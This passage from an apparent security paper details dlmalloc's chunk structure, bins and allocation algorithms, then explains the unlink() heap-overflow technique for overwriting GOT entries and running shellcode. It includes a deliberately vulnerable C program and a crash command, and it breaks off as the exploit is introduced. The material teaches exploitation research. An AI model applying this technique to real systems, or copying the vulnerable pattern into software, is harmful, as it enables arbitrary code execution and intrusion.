dlmalloc in order to allocate dynamic memory, the effective size of the chunk allocated (the number of bytes actually isolated in the heap) is never equal to the size requested by the user. This overhead is the result of the presence of boundary tags before and after the buffer returned to the user, and the result of the 8 byte alignment mentioned in 3.1.1. - Alignment: Since the size of a chunk is always a multiple of 8 bytes (how the effective size of a chunk is computed is detailed in 3.3.2) and since the very first chunk in the heap is 8 byte aligned, the chunks of memory returned to the user (and the associated boundary tags) are always aligned on addresses that are multiples of 8 bytes. - Minimum overhead per allocated chunk: Each allocated chunk has a hidden overhead of (at least) 4 bytes. The integer composed of these 4 bytes, a field of the boundary tag associated with each chunk, holds size and status information, and is detailed in 3.3.4. - Minimum allocated size: When malloc(3) is called with a size argument of zero, Doug Lea's Malloc actually allocates 16 bytes in the heap (the minimum allocated size, the size of a boundary tag). ------[ 3.2.3 - Available chunks ]-------------------------------------- Available chunks are kept in any of several places (all declared below): - the bins (mentioned in 3.1.2.2 and detailed in 3.4) exclusively hold free chunks of memory; - the top-most available chunk (the wilderness chunk presented in 3.1.2.4) is always free and never included in any bin; - the remainder of the most recently split (non-top) chunk is always free and never included in any bin. ----[ 3.3 - Boundary tags ]--------------------------------------------- ------[ 3.3.1 - Structure ]--------------------------------------------- #define INTERNAL_SIZE_T size_t struct malloc_chunk { INTERNAL_SIZE_T prev_size; INTERNAL_SIZE_T size; struct malloc_chunk * fd; struct malloc_chunk * bk; }; This structure, stored in front of each chunk of memory managed by Doug Lea's Malloc, is a representation of the boundary tags presented in 3.1.2.1. The way its fields are used depends on whether the associated chunk is free or not, and whether the previous chunk is free or not. - An allocated chunk looks like this: chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | prev_size: size of the previous chunk, in bytes (used | | by dlmalloc only if this previous chunk is free) | +---------------------------------------------------------+ | size: size of the chunk (the number of bytes between | | "chunk" and "nextchunk") and 2 bits status information | mem -> +---------------------------------------------------------+ | fd: not used by dlmalloc because "chunk" is allocated | | (user data therefore starts here) | + - - - - - - - - - - - - - - - - - - - - - - - - - - - - + | bk: not used by dlmalloc because "chunk" is allocated | | (there may be user data here) | + - - - - - - - - - - - - - - - - - - - - - - - - - - - - + | . . . . user data (may be 0 bytes long) . . . . | nextchunk -> + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + | prev_size: not used by dlmalloc because "chunk" is | | allocated (may hold user data, to decrease wastage) | +---------------------------------------------------------+ "chunk" is the front of the chunk (and therefore the front of the associated boundary tag) for the purpose of most of the dlmalloc code, "nextchunk" is the beginning of the next contiguous chunk, and "mem" is the pointer that is returned to the user (by malloc(3) or realloc(3) for example). The conversion from malloc headers ("chunk") to user pointers ("mem"), and back, is performed by two macros, chunk2mem() and mem2chunk(). They simply add or subtract 8 bytes (the size of the prev_size and size fields that separate "mem" from "chunk"): #define Void_t void #define SIZE_SZ sizeof(INTERNAL_SIZE_T) typedef struct malloc_chunk * mchunkptr; #define chunk2mem( p ) \ ( (Void_t *)((char *)(p) + 2*SIZE_SZ) ) #define mem2chunk( mem ) \ ( (mchunkptr)((char *)(mem) - 2*SIZE_SZ) ) Although a user should never utilize more bytes than they requested, the number of bytes reserved for the user by Doug Lea's Malloc may actually be greater than the amount of requested dynamic memory (because of the 8 byte alignment). As a matter of fact, the memory area where the user could store data without corrupting the heap starts at "mem" and ends at (but includes) the prev_size field of "nextchunk" (indeed, this prev_size field is not used by dlmalloc (since "chunk" is allocated) and may thence hold user data, in order to decrease wastage), and is therefore (("nextchunk" + 4) - "mem") bytes long (the 4 additional bytes correspond to the size of this trailing prev_size field). But the size of this memory area, (("nextchunk" + 4) - "mem"), is also equal to (("nextchunk" + 4) - ("chunk" + 8)), which is of course equal to (("nextchunk" - "chunk") - 4). Since ("nextchunk" - "chunk") is the effective size of "chunk", the size of the memory area where the user could store data without corrupting the heap is equal to the effective size of the chunk minus 4 bytes. - Free chunks are stored in circular doubly-linked lists (described in 3.4.2) and look like this: chunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | prev_size: may hold user data (indeed, since "chunk" is | | free, the previous chunk is necessarily allocated) | +---------------------------------------------------------+ | size: size of the chunk (the number of bytes between | | "chunk" and "nextchunk") and 2 bits status information | +---------------------------------------------------------+ | fd: forward pointer to the next chunk in the circular | | doubly-linked list (not to the next _physical_ chunk) | +---------------------------------------------------------+ | bk: back pointer to the previous chunk in the circular | | doubly-linked list (not the previous _physical_ chunk) | +---------------------------------------------------------+ | . . . . unused space (may be 0 bytes long) . . . . | nextchunk -> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | prev_size: size of "chunk", in bytes (used by dlmalloc | | because this previous chunk is free) | +---------------------------------------------------------+ ------[ 3.3.2 - Size of a chunk ]--------------------------------------- When a user requests req bytes of dynamic memory (via malloc(3) or realloc(3) for example), dlmalloc first calls request2size() in order to convert req to a usable size nb (the effective size of the allocated chunk of memory, including overhead). The request2size() macro could just add 8 bytes (the size of the prev_size and size fields stored in front of the allocated chunk) to req and therefore look like this: #define request2size( req, nb ) \ ( nb = (req) + SIZE_SZ + SIZE_SZ ) But this first version of request2size() is not optimal because it does not take into account the fact that the prev_size field of the next contiguous chunk can hold user data. The request2size() macro should therefore subtract 4 bytes (the size of this trailing prev_size field) from the previous result: #define request2size( req, nb ) \ ( nb = ((req) + SIZE_SZ + SIZE_SZ) - SIZE_SZ ) This macro is of course equivalent to: #define request2size( req, nb ) \ ( nb = (req) + SIZE_SZ ) Unfortunately this request2size() macro is not correct, because as mentioned in 3.2.2, the size of a chunk should always be a multiple of 8 bytes. request2size() should therefore return the first multiple of 8 bytes greater than or equal to ((req) + SIZE_SZ): #define MALLOC_ALIGNMENT ( SIZE_SZ + SIZE_SZ ) #define MALLOC_ALIGN_MASK ( MALLOC_ALIGNMENT - 1 ) #define request2size( req, nb ) \ ( nb = (((req) + SIZE_SZ) + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK ) The request2size() function implemented in the Sudo exploit is alike but returns MINSIZE if the theoretic effective size of the chunk is less than MINSIZE bytes (the minimum allocatable size): #define MINSIZE sizeof(struct malloc_chunk) size_t request2size( size_t req ) { size_t nb; nb = req + ( SIZE_SZ + MALLOC_ALIGN_MASK ); if ( nb < (MINSIZE + MALLOC_ALIGN_MASK) ) { nb = MINSIZE; } else { nb &= ~MALLOC_ALIGN_MASK; } return( nb ); } Finally, the request2size() macro implemented in Doug Lea's Malloc works likewise but adds an integer overflow detection: #define request2size(req, nb) \ ((nb = (req) + (SIZE_SZ + MALLOC_ALIGN_MASK)),\ ((long)nb <= 0 || nb < (INTERNAL_SIZE_T) (req) \ ? (__set_errno (ENOMEM), 1) \ : ((nb < (MINSIZE + MALLOC_ALIGN_MASK) \ ? (nb = MINSIZE) : (nb &= ~MALLOC_ALIGN_MASK)), 0))) ------[ 3.3.3 - prev_size field ]--------------------------------------- If the chunk of memory located immediately before a chunk p is allocated (how dlmalloc determines whether this previous chunk is allocated or not is detailed in 3.3.4), the 4 bytes corresponding to the prev_size field of the chunk p are not used by dlmalloc and may therefore hold user data (in order to decrease wastage). But if the chunk of memory located immediately before the chunk p is free, the prev_size field of the chunk p is used by dlmalloc and holds the size of that previous free chunk. Given a pointer to the chunk p, the address of the previous chunk can therefore be computed, thanks to the prev_chunk() macro: #define prev_chunk( p ) \ ( (mchunkptr)(((char *)(p)) - ((p)->prev_size)) ) ------[ 3.3.4 - size field ]-------------------------------------------- The size field of a boundary tag holds the effective size (in bytes) of the associated chunk of memory and additional status information. This status information is stored within the 2 least significant bits, which would otherwise be unused (because as detailed in 3.3.2, the size of a chunk is always a multiple of 8 bytes, and the 3 least significant bits of a size field would therefore always be equal to 0). The low-order bit of the size field holds the PREV_INUSE bit and the second-lowest-order bit holds the IS_MMAPPED bit: #define PREV_INUSE 0x1 #define IS_MMAPPED 0x2 In order to extract the effective size of a chunk p from its size field, dlmalloc therefore needs to mask these two status bits, and uses the chunksize() macro for this purpose: #define SIZE_BITS ( PREV_INUSE | IS_MMAPPED ) #define chunksize( p ) \ ( (p)->size & ~(SIZE_BITS) ) - If the IS_MMAPPED bit is set, the associated chunk was allocated via the memory mapping mechanism described in 3.1.2.5. In order to determine whether a chunk of memory p was allocated via this mechanism or not, Doug Lea's Malloc calls chunk_is_mmapped(): #define chunk_is_mmapped( p ) \ ( (p)->size & IS_MMAPPED ) - If the PREV_INUSE bit of a chunk p is set, the physical chunk of memory located immediately before p is allocated, and the prev_size field of the chunk p may therefore hold user data. But if the PREV_INUSE bit is clear, the physical chunk of memory before p is free, and the prev_size field of the chunk p is therefore used by dlmalloc and contains the size of that previous physical chunk. Doug Lea's Malloc uses the macro prev_inuse() in order to determine whether the physical chunk located immediately before a chunk of memory p is allocated or not: #define prev_inuse( p ) \ ( (p)->size & PREV_INUSE ) But in order to determine whether the chunk p itself is in use or not, dlmalloc has to extract the PREV_INUSE bit of the next contiguous chunk of memory: #define inuse( p ) \ (((mchunkptr)((char*)(p)+((p)->size&~PREV_INUSE)))->size&PREV_INUSE) ----[ 3.4 - Bins ]------------------------------------------------------ "Available chunks are maintained in bins, grouped by size", as mentioned in 3.1.2.2 and 3.2.3. The two exceptions are the remainder of the most recently split (non-top) chunk of memory and the top-most available chunk (the wilderness chunk) which are treated specially and never included in any bin. ------[ 3.4.1 - Indexing into bins ]------------------------------------ There are a lot of these bins (128), and depending on its size (its effective size, not the size requested by the user) a free chunk of memory is stored by dlmalloc in the bin corresponding to the right size range. In order to find out the index of this bin (the 128 bins are indeed stored in an array of bins), dlmalloc calls the macros smallbin_index() and bin_index(). #define smallbin_index( sz ) \ ( ((unsigned long)(sz)) >> 3 ) Doug Lea's Malloc considers the chunks whose size is less than 512 bytes to be small chunks, and stores these chunks in one of the 62 so-called small bins. Each small bin holds identically sized chunks, and because the minimum allocated size is 16 bytes and the size of a chunk is always a multiple of 8 bytes, the first small bin holds the 16 bytes chunks, the second one the 24 bytes chunks, the third one the 32 bytes chunks, and so on, and the last one holds the 504 bytes chunks. The index of the bin corresponding to the size sz of a small chunk is therefore (sz / 8), as implemented in the smallbin_index() macro. #define bin_index(sz) \ ((((unsigned long)(sz) >> 9) == 0) ? ((unsigned long)(sz) >> 3):\ (((unsigned long)(sz) >> 9) <= 4) ? 56 + ((unsigned long)(sz) >> 6):\ (((unsigned long)(sz) >> 9) <= 20) ? 91 + ((unsigned long)(sz) >> 9):\ (((unsigned long)(sz) >> 9) <= 84) ? 110 + ((unsigned long)(sz) >> 12):\ (((unsigned long)(sz) >> 9) <= 340) ? 119 + ((unsigned long)(sz) >> 15):\ (((unsigned long)(sz) >> 9) <= 1364) ? 124 + ((unsigned long)(sz) >> 18):\ 126) The index of the bin corresponding to a chunk of memory whose size is greater than or equal to 512 bytes is obtained via the bin_index() macro. Thanks to bin_index(), the size range corresponding to each bin can be determined: - A free chunk whose size is equal to 1504 bytes for example is stored in the bin number 79 (56 + (1504 >> 6)) since (1504 >> 9) is equal to 2 and therefore greater than 0 but less than or equal to 4. Moreover, the bin number 79 holds the chunks whose size is greater than or equal to 1472 ((1504 >> 6) * 2^6) bytes but less than 1536 (1472 + 2^6). - A free chunk whose size is equal to 16392 bytes is stored in the bin number 114 (110 + (16392 >> 12)) since (16392 >> 9) is equal to 32 and therefore greater than 20 but less than or equal to 84. Moreover, the bin number 114 holds the chunks whose size is greater than or equal to 16384 ((16392 >> 12) * 2^12) bytes but less than 20480 (16384 + 2^12). - And so on. ------[ 3.4.2 - Linkin Park^H^H^H^H^Hg chunks in bin lists ]------------ The free chunks of memory are stored in circular doubly-linked lists. There is one circular doubly-linked list per bin, and these lists are initially empty because at the start the whole heap is composed of one single chunk (never included in any bin), the wilderness chunk. A bin is nothing more than a pair of pointers (a forward pointer and a back pointer) serving as the head of the associated doubly-linked list. "The chunks in each bin are maintained in decreasing sorted order by size. This is irrelevant for the small bins, which all contain the same-sized chunks, but facilitates best-fit allocation for larger chunks." The forward pointer of a bin therefore points to the first (the largest) chunk of memory in the list (or to the bin itself if the list is empty), the forward pointer of this first chunk points to the second chunk in the list, and so on until the forward pointer of a chunk (the last chunk in the list) points to the bin again. The back pointer of a bin instead points to the last (the smallest) chunk of memory in the list (or to the bin itself if the list is empty), the back pointer of this chunk points to the previous chunk in the list, and so on until the back pointer of a chunk (the first chunk in the list) points to the bin again. - In order to take a free chunk p off its doubly-linked list, dlmalloc has to replace the back pointer of the chunk following p in the list with a pointer to the chunk preceding p in the list, and the forward pointer of the chunk preceding p in the list with a pointer to the chunk following p in the list. Doug Lea's Malloc calls the unlink() macro for this purpose: #define unlink( P, BK, FD ) { \ BK = P->bk; \ FD = P->fd; \ FD->bk = BK; \ BK->fd = FD; \ } - In order to place a free chunk P of size S in its bin (in the associated doubly-linked list actually), in size order, dlmalloc calls frontlink(). "Chunks of the same size are linked with the most recently freed at the front, and allocations are taken from the back. This results in LRU or FIFO allocation order", as mentioned in 3.1.2.2. The frontlink() macro calls smallbin_index() or bin_index() (presented in 3.4.1) in order to find out the index IDX of the bin corresponding to the size S, calls mark_binblock() in order to indicate that this bin is not empty anymore, calls bin_at() in order to determine the physical address of the bin, and finally stores the free chunk P at the right place in the doubly-linked list of the bin: #define frontlink( A, P, S, IDX, BK, FD ) { \ if ( S < MAX_SMALLBIN_SIZE ) { \ IDX = smallbin_index( S ); \ mark_binblock( A, IDX ); \ BK = bin_at( A, IDX ); \ FD = BK->fd; \ P->bk = BK; \ P->fd = FD; \ FD->bk = BK->fd = P; \ } else { \ IDX = bin_index( S ); \ BK = bin_at( A, IDX ); \ FD = BK->fd; \ if ( FD == BK ) { \ mark_binblock(A, IDX); \ } else { \ while ( FD != BK && S < chunksize(FD) ) { \ FD = FD->fd; \ } \ BK = FD->bk; \ } \ P->bk = BK; \ P->fd = FD; \ FD->bk = BK->fd = P; \ } \ } ----[ 3.5 - Main public routines ]-------------------------------------- The final purpose of an attacker who managed to smash the heap of a process is to execute arbitrary code. Doug Lea's Malloc can be tricked into achieving this goal after a successful heap corruption, either thanks to the unlink() macro, or thanks to the frontlink() macro, both presented above and detailed in 3.6. The following description of the malloc(3), free(3) and realloc(3) algorithms therefore focuses on these two internal macros. ------[ 3.5.1 - The malloc(3) algorithm ]------------------------------- The malloc(3) function, named __libc_malloc() in the GNU C Library (malloc() is just a weak symbol) and mALLOc() in the malloc.c file, executes in the first place the code pointed to by __malloc_hook if this debugging hook is not equal to NULL (but it normally is). Next malloc(3) converts the amount of dynamic memory requested by the user into a usable form (via request2size() presented in 3.3.2), and calls the internal function chunk_alloc() that takes the first successful of the following steps: [1] - "The bin corresponding to the request size is scanned, and if a chunk of exactly the right size is found, it is taken." Doug Lea's Malloc considers a chunk to be "of exactly the right size" if the difference between its size and the request size is greater than or equal to 0 but less than MINSIZE bytes. If this difference was less than 0 the chunk would not be big enough, and if the difference was greater than or equal to MINSIZE bytes (the minimum allocated size) dlmalloc could form a new chunk with this overhead and should therefore perform a split operation (not supported by this first step). [1.1] -- The case of a small request size (a request size is small if both the corresponding bin and the next bin are small (small bins are described in 3.4.1)) is treated separately: [1.1.1] --- If the doubly-linked list of the corresponding bin is not empty, chunk_alloc() selects the last chunk in this list (no traversal of the list and no size check are necessary for small bins since they hold identically sized chunks). [1.1.2] --- But if this list is empty, and if the doubly-linked list of the next bin is not empty, chunk_alloc() selects the last chunk in this list (the difference between the size of this chunk and the request size is indeed less than MINSIZE bytes (it is equal to 8 bytes, as detailed in 3.4.1)). [1.1.3] --- Finally, if a free chunk of exactly the right size was found and selected, chunk_alloc() calls unlink() in order to take this chunk off its doubly-linked list, and returns it to mALLOc(). If no such chunk was found, the step[2] is carried out. [1.2] -- If the request size is not small, the doubly-linked list of the corresponding bin is scanned. chunk_alloc() starts from the last (the smallest) free chunk in the list and follows the back pointer of each traversed chunk: [1.2.1] --- If during the scan a too big chunk is encountered (a chunk whose size is MINSIZE bytes or more greater than the request size), the scan is aborted since the next traversed chunks would be too big also (the chunks are indeed sorted by size within a doubly-linked list) and the step[2] is carried out. [1.2.2] --- But if a chunk of exactly the right size is found, unlink() is called in order to take it off its doubly-linked list, and the chunk is then returned to mALLOc(). If no big enough chunk was found at all during the scan, the step[2] is carried out. [2] - "The most recently remaindered chunk is used if it is big enough." But this particular free chunk of memory does not always exist: dlmalloc gives this special meaning (the `last_remainder' label) to a free chunk with the macro link_last_remainder(), and removes this special meaning with the macro clear_last_remainder(). So if one of the available free chunks is marked with the label `last_remainder': [2.1] -- It is divided into two parts if it is too big (if the difference between its size and the request size is greater than or equal to MINSIZE bytes). The first part (whose size is equal to the request size) is returned to mALLOc() and the second part becomes the new `last_remainder' (via link_last_remainder()). [2.2] -- But if the difference between the size of the `last_remainder' chunk and the request size is less than MINSIZE bytes, chunk_alloc() calls clear_last_remainder() and next: [2.2.1] --- Returns that most recently remaindered chunk (that just lost its label `last_remainder' because of the clear_last_remainder() call) to mALLOc() if it is big enough (if the difference between its size and the request size is greater than or equal to 0). [2.2.2] --- Or places this chunk in its doubly-linked list (thanks to the frontlink() macro) if it is too small (if the difference between its size and the request size is less than 0), and carries out the step[3]. [3] - "Other bins are scanned in increasing size order, using a chunk big enough to fulfill the request, and splitting off any remainder." The scanned bins (the scan of a bin consists in traversing the associated doubly-linked list, starting from the last (the smallest) free chunk in the list, and following the back pointer of each traversed chunk) all correspond to sizes greater than or equal to the request size and are processed one by one (starting from the bin where the search at step[1] stopped) until a big enough chunk is found: [3.1] -- This big enough chunk is divided into two parts if it is too big (if the difference between its size and the request size is greater than or equal to MINSIZE bytes). The first part (whose size is equal to the request size) is taken off its doubly-linked list via unlink() and returned to mALLOc(). The second part becomes the new `last_remainder' via link_last_remainder(). [3.2] -- But if a chunk of exactly the right size was found, unlink() is called in order to take it off its doubly-linked list, and the chunk is then returned to mALLOc(). If no big enough chunk was found at all, the step[4] is carried out. [4] - "If large enough, the chunk bordering the end of memory (`top') is split off." The chunk bordering the end of the heap (the wilderness chunk presented in 3.1.2.4) is large enough if the difference between its size and the request size is greater than or equal to MINSIZE bytes (the step[5] is otherwise carried out). The wilderness chunk is then divided into two parts: the first part (whose size is equal to the request size) is returned to mALLOc(), and the second part becomes the new wilderness chunk. [5] - "If the request size meets the mmap threshold and the system supports mmap, and there are few enough currently allocated mmapped regions, and a call to mmap succeeds, the request is allocated via direct memory mapping." Doug Lea's Malloc calls the internal function mmap_chunk() if the above conditions are fulfilled (the step[6] is otherwise carried out), but since the default value of the mmap threshold is rather large (128k), and since the MALLOC_MMAP_THRESHOLD_ environment variable cannot override this default value when a SUID or SGID program is run, mmap_chunk() is not detailed in the present paper. [6] - "Otherwise, the top of memory is extended by obtaining more space from the system (normally using sbrk, but definable to anything else via the MORECORE macro)." After a successful extension, the wilderness chunk is split off as it would have been at step[4], but if the extension fails, a NULL pointer is returned to mALLOc(). ------[ 3.5.2 - The free(3) algorithm ]--------------------------------- The free(3) function, named __libc_free() in the GNU C Library (free() is just a weak symbol) and fREe() in the malloc.c file, executes in the first place the code pointed to by __free_hook if this debugging hook is not equal to NULL (but it normally is), and next distinguishes between the following cases: [1] - "free(0) has no effect." But if the pointer argument passed to free(3) is not equal to NULL (and it is usually not), the step[2] is carried out. [2] - "If the chunk was allocated via mmap, it is released via munmap()." The fREe() function determines (thanks to the macro chunk_is_mmapped() presented in 3.3.4) whether the chunk to be freed was allocated via the memory mapping mechanism (described in 3.1.2.5) or not, and calls the internal function munmap_chunk() (not detailed in the present paper) if it was, but calls chunk_free() (step[3] and step[4]) if it was not. [3] - "If a returned chunk borders the current high end of memory, it is consolidated into the top". If the chunk to be freed is located immediately before the top-most available chunk (the wilderness chunk), a new wilderness chunk is assembled (but the step[4] is otherwise carried out): [3.1] -- If the chunk located immediately before the chunk being freed is unused, it is taken off its doubly-linked list via unlink() and becomes the beginning of the new wilderness chunk (composed of the former wilderness chunk, the chunk being freed, and the chunk located immediately before). As a side note, unlink() is equivalent to clear_last_remainder() if the processed chunk is the `last_remainder'. [3.2] -- But if that previous chunk is allocated, the chunk being freed becomes the beginning of the new wilderness chunk (composed of the former wilderness chunk and the chunk being freed). [4] - "Other chunks are consolidated as they arrive, and placed in corresponding bins. (This includes the case of consolidating with the current `last_remainder')." [4.1] -- If the chunk located immediately before the chunk to be freed is unused, it is taken off its doubly-linked list via unlink() (if it is not the `last_remainder') and consolidated with the chunk being freed. [4.2] -- If the chunk located immediately after the chunk to be freed is unused, it is taken off its doubly-linked list via unlink() (if it is not the `last_remainder') and consolidated with the chunk being freed. [4.3] -- The resulting coalesced chunk is placed in its doubly-linked list (via the frontlink() macro), or becomes the new `last_remainder' if the old `last_remainder' was consolidated with the chunk being freed (but the link_last_remainder() macro is called only if the beginning of the new `last_remainder' is different from the beginning of the old `last_remainder'). ------[ 3.5.3 - The realloc(3) algorithm ]------------------------------ The realloc(3) function, named __libc_realloc() in the GNU C Library (realloc() is just a weak symbol) and rEALLOc() in the malloc.c file, executes in the first place the code pointed to by __realloc_hook if this debugging hook is not equal to NULL (but it normally is), and next distinguishes between the following cases: [1] - "Unless the #define REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of zero (re)allocates a minimum-sized chunk." But if REALLOC_ZERO_BYTES_FREES is set, and if realloc(3) was called with a size argument of zero, the fREe() function (described in 3.5.2) is called in order to free the chunk of memory passed to realloc(3). The step[2] is otherwise carried out. [2] - "realloc of null is supposed to be same as malloc". If realloc(3) was called with a pointer argument of NULL, the mALLOc() function (detailed in 3.5.1) is called in order to allocate a new chunk of memory. The step[3] is otherwise carried out, but the amount of dynamic memory requested by the user is first converted into a usable form (via request2size() presented in 3.3.2). [3] - "Chunks that were obtained via mmap [...]." rEALLOc() calls the macro chunk_is_mmapped() (presented in 3.3.4) in order to determine whether the chunk to be reallocated was obtained via the memory mapping mechanism (described in 3.1.2.5) or not. If it was, specific code (not detailed in the present paper) is executed, but if it was not, the chunk to be reallocated is processed by the internal function chunk_realloc() (step[4] and next ones). [4] - "If the reallocation is for less space [...]." [4.1] -- The processed chunk is divided into two parts if its size is MINSIZE bytes or more greater than the request size: the first part (whose size is equal to the request size) is returned to rEALLOc(), and the second part is freed via a call to chunk_free() (detailed in 3.5.2). [4.2] -- But the processed chunk is simply returned to rEALLOc() if the difference between its size and the request size is less than MINSIZE bytes (this difference is of course greater than or equal to 0 since the size of the processed chunk is greater than or equal to the request size). [5] - "Otherwise, if the reallocation is for additional space, and the chunk can be extended, it is, else a malloc-copy-free sequence is taken. There are several different ways that a chunk could be extended. All are tried:" [5.1] -- "Extending forward into following adjacent free chunk." If the chunk of memory located immediately after the chunk to be reallocated is free, the two following steps are tried before the step[5.2] is carried out: [5.1.1] --- If this free chunk is the top-most available chunk (the wilderness chunk) and if its size plus the size of the chunk being reallocated is MINSIZE bytes or more greater than the request size, the wilderness chunk is divided into two parts. The first part is consolidated with the chunk being reallocated and the resulting coalesced chunk is returned to rEALLOc() (the size of this coalesced chunk is of course equal to the request size), and the second part becomes the new wilderness chunk. [5.1.2] --- But if that free chunk is a normal free chunk, and if its size plus the size of the chunk being reallocated is greater than or equal to the request size, it is taken off its doubly-linked list via unlink() (equivalent to clear_last_remainder() if the processed chunk is the `last_remainder') and consolidated with the chunk being freed, and the resulting coalesced chunk is then treated as it would have been at step[4]. [5.2] -- "Both shifting backwards and extending forward." If the chunk located immediately before the chunk to be reallocated is free, and if the chunk located immediately after is free as well, the two following steps are tried before the step[5.3] is carried out: [5.2.1] --- If the chunk located immediately after the chunk to be reallocated is the top-most available chunk (the wilderness chunk) and if its size plus the size of the chunk being reallocated plus the size of the previous chunk is MINSIZE bytes or more greater than the request size, the said three chunks are coalesced. The previous chunk is first taken off its doubly-linked list via unlink() (equivalent to clear_last_remainder() if the processed chunk is the `last_remainder'), the content of the chunk being reallocated is then copied to the newly coalesced chunk, and this coalesced chunk is finally divided into two parts: the first part is returned to rEALLOc() (the size of this chunk is of course equal to the request size), and the second part becomes the new wilderness chunk. [5.2.2] --- If the chunk located immediately after the chunk to be reallocated is a normal free chunk, and if its size plus the size of the chunk being reallocated plus the size of the previous chunk is greater than or equal to the request size, the said three chunks are coalesced. The previous and next chunks are first taken off their doubly-linked lists via unlink() (equivalent to clear_last_remainder() if the processed chunk is the `last_remainder'), the content of the chunk being reallocated is then copied to the newly coalesced chunk, and this coalesced chunk is finally treated as it would have been at step[4]. [5.3] -- "Shifting backwards, joining preceding adjacent space". If the chunk located immediately before the chunk to be reallocated is free and if its size plus the size of the chunk being reallocated is greater than or equal to the request size, the said two chunks are coalesced (but the step[5.4] is otherwise carried out). The previous chunk is first taken off its doubly-linked list via unlink() (equivalent to clear_last_remainder() if the processed chunk is the `last_remainder'), the content of the chunk being reallocated is then copied to the newly coalesced chunk, and this coalesced chunk is finally treated as it would have been at step[4]. [5.4] -- If the chunk to be reallocated could not be extended, the internal function chunk_alloc() (detailed in 3.5.1) is called in order to allocate a new chunk of exactly the request size: [5.4.1] --- If the chunk returned by chunk_alloc() is located immediately after the chunk being reallocated (this can only happen when that next chunk was extended during the chunk_alloc() execution (since it was not big enough before), so this can only happen when this next chunk is the wilderness chunk, extended during the step[6] of the malloc(3) algorithm), it is consolidated with the chunk being reallocated and the resulting coalesced chunk is then treated as it would have been at step[4]. [5.4.2] --- The chunk being reallocated is otherwise freed via chunk_free() (detailed in 3.5.2), but its content is first copied to the newly allocated chunk returned by chunk_alloc(). Finally, the chunk returned by chunk_alloc() is returned to rEALLOc(). ----[ 3.6 - Execution of arbitrary code ]------------------------------- ------[ 3.6.1 - The unlink() technique ]-------------------------------- --------[ 3.6.1.1 - Concept ]------------------------------------------- If an attacker manages to trick dlmalloc into processing a carefully crafted fake chunk of memory (or a chunk whose fd and bk fields have been corrupted) with the unlink() macro, they will be able to overwrite any integer in memory with the value of their choosing, and will therefore be able to eventually execute arbitrary code. #define unlink( P, BK, FD ) { \ [1] BK = P->bk; \ [2] FD = P->fd; \ [3] FD->bk = BK; \ [4] BK->fd = FD; \ } Indeed, the attacker could store the address of a function pointer, minus 12 bytes as explained below, in the forward pointer FD of the fake chunk (read at line[2]), and the address of a shellcode in the back pointer BK of the fake chunk (read at line[1]). The unlink() macro would therefore, when trying to take this fake chunk off its imaginary doubly-linked list, overwrite (at line[3]) the function pointer located at FD plus 12 bytes (12 is the offset of the bk field within a boundary tag) with BK (the address of the shellcode). If the vulnerable program reads the overwritten function pointer (an entry of the GOT (Global Offset Table) or one of the debugging hooks compiled in Doug Lea's Malloc (__malloc_hook, __free_hook, etc) for example) and jumps to the memory location it points to, and if a valid shellcode is stored there at that time, the shellcode is executed. But since unlink() would also overwrite (at line[4]) an integer located in the very middle of the shellcode, at BK plus 8 bytes (8 is the offset of the fd field within a boundary tag), with FD (a valid pointer but probably not valid machine code), the first instruction of the shellcode should jump over the overwritten integer, into a classic shellcode. This unlink() technique, first introduced by Solar Designer, is illustrated with a proof of concept in 3.6.1.2, and was successfully exploited in the wild against certain vulnerable versions of programs like Netscape browsers, traceroute, and slocate (mentioned in 3.1.2.1). --------[ 3.6.1.2 - Proof of concept ]---------------------------------- The program below contains a typical buffer overflow since an attacker can overwrite (at line[3]) the data stored immediately after the end of the first buffer if the first argument they passed to the program (argv[1]) is larger than 666 bytes: $ set -o noclobber && cat > vulnerable.c << EOF #include #include int main( int argc, char * argv[] ) { char * first, * second; /*[1]*/ first = malloc( 666 ); /*[2]*/ second = malloc( 12 ); /*[3]*/ strcpy( first, argv[1] ); /*[4]*/ free( first ); /*[5]*/ free( second ); /*[6]*/ return( 0 ); } EOF $ make vulnerable cc vulnerable.c -o vulnerable $ ./vulnerable `perl -e 'print "B" x 1337'` Segmentation fault (core dumped) Since the first buffer was allocated in the heap (at line[1], or more precisely during the step[4] of the malloc(3) algorithm) and not on the stack, the attacker cannot use the classic stack smashing techniques and simply overwrite a saved instruction pointer or a saved frame pointer in order to exploit the vulnerability and execute arbitrary code: http://www.phrack.org/show.php?p=49&a=14 http://www.phrack.org/show.php?p=55&a=8 But the attacker could overwrite the boundary tag associated with the second chunk of memory (allocated in the heap at line[2], during the step[4] of the malloc(3) algorithm), since this boundary tag is located immediately after the end of the first chunk. The memory area reserved for the user within the first chunk even includes the prev_size field of that boundary tag (as detailed in 3.3.3), and the size of this area is equal to 668 bytes (indeed, and as calculated in 3.3.1, the size of the memory area reserved for the user within the first chunk is equal to the effective size of this chunk, 672 (request2size(666)), minus 4 bytes). So if the size of the first argument passed to the vulnerable program by the attacker is greater than or equal to 680 (668 + 3*4) bytes, the attacker will be able to overwrite the size, fd and bk fields of the boundary tag associated with the second chunk. They could therefore use the unlink() technique, but how can dlmalloc be tricked into processing the corrupted second chunk with unlink() since this chunk is allocated? When free(3) is called at line[4] in order to free the first chunk, the step[4.2] of the free(3) algorithm is carried out and the second chunk is processed by unlink() if it is free (if the PREV_INUSE bit of the next contiguous chunk is clear). Unfortunately this bit is set because the second chunk is allocated, but the attacker can trick dlmalloc into reading a fake PREV_INUSE bit since they control the size field of the second chunk (used by dlmalloc in order to compute the address of the next contiguous chunk). For instance, if the attacker overwrites the size field of the second chunk with -4 (0xfffffffc), dlmalloc will think the beginning of the next contiguous chunk is in fact 4 bytes before the beginning of the second chunk, and will therefore read the prev_size field of the second chunk instead of the size field of the next contiguous chunk. So if the attacker stores an even integer (an integer whose PREV_INUSE bit is clear) in this prev_size field, dlmalloc will process the corrupted second chunk with unlink() and the attacker will be able to apply the technique described in 3.6.1.1. Indeed, the exploit below overwrites the fd field of the second chunk with a pointer to the GOT entry of the free(3) function (read at line[5] after the unlink() attack) minus 12 bytes, and overwrites the bk field of the second chunk with the address of a special 